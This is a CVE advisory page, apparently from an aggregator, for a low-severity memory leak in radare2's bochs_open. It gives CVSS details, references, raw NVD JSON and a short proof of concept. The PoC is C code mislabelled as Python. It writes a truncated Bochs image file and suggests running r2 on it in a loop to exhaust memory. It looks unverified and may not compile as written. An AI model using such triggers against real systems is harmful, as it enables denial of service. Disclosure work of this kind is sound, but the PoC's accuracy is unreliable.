CVE-2025-60361

Description

radare2 v5.9.8 and before contains a memory leak in the function bochs_open.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:* - VULNERABLE

radare2 <= 5.9.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-60361 PoC - radare2 bochs_open Memory Leak
// This PoC demonstrates triggering the memory leak in bochs_open function

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Minimal Bochs disk image header structure
// Bochs images start with a specific header that radare2 parses via bochs_open
typedef struct {
    char signature[32];      // "Bochs Virtual HD Image\n" or similar
    char type[16];           // "flat", "growing", etc.
    char subtype[16];        // Subtype identifier
    uint32_t header_size;    // Size of the header
} bochs_header_t;

int main(int argc, char *argv[]) {
    const char *filename = "leak_test.bochs";
    int iterations = 10000;
    
    // Create a minimal Bochs image file to trigger bochs_open
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("fopen");
        return 1;
    }
    
    // Write Bochs header signature
    // The malformed/truncated header triggers the leak path in bochs_open
    const char *bochs_sig = "Bochs Virtual HD Image\n";
    fwrite(bochs_sig, 1, strlen(bochs_sig), fp);
    
    // Write partial type field to trigger error path with memory leak
    fwrite("flat", 1, 4, fp);
    
    fclose(fp);
    
    printf("Created test file: %s\n", filename);
    printf("Now run: r2 %s repeatedly to trigger memory leak in bochs_open\n", filename);
    printf("Example: for i in $(seq 1 %d); do r2 -q %s; done\n", iterations, filename);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60361
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60361
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60361/
[4] VulDB https://vuldb.com/cve/CVE-2025-60361
[5] https://github.com/radareorg/radare2/pull/24312

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60361", "sourceIdentifier": "[email protected]", "published": "2025-10-17T15:15:39.503", "lastModified": "2025-10-23T12:35:50.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "radare2 v5.9.8 and before contains a memory leak in the function bochs_open."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.9.8", "matchCriteriaId": "DD7ED9A8-17F8-4FD1-8D7F-EBBB728A07CD"}]}]}], "references": [{"url": "https://github.com/radareorg/radare2/pull/24312", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}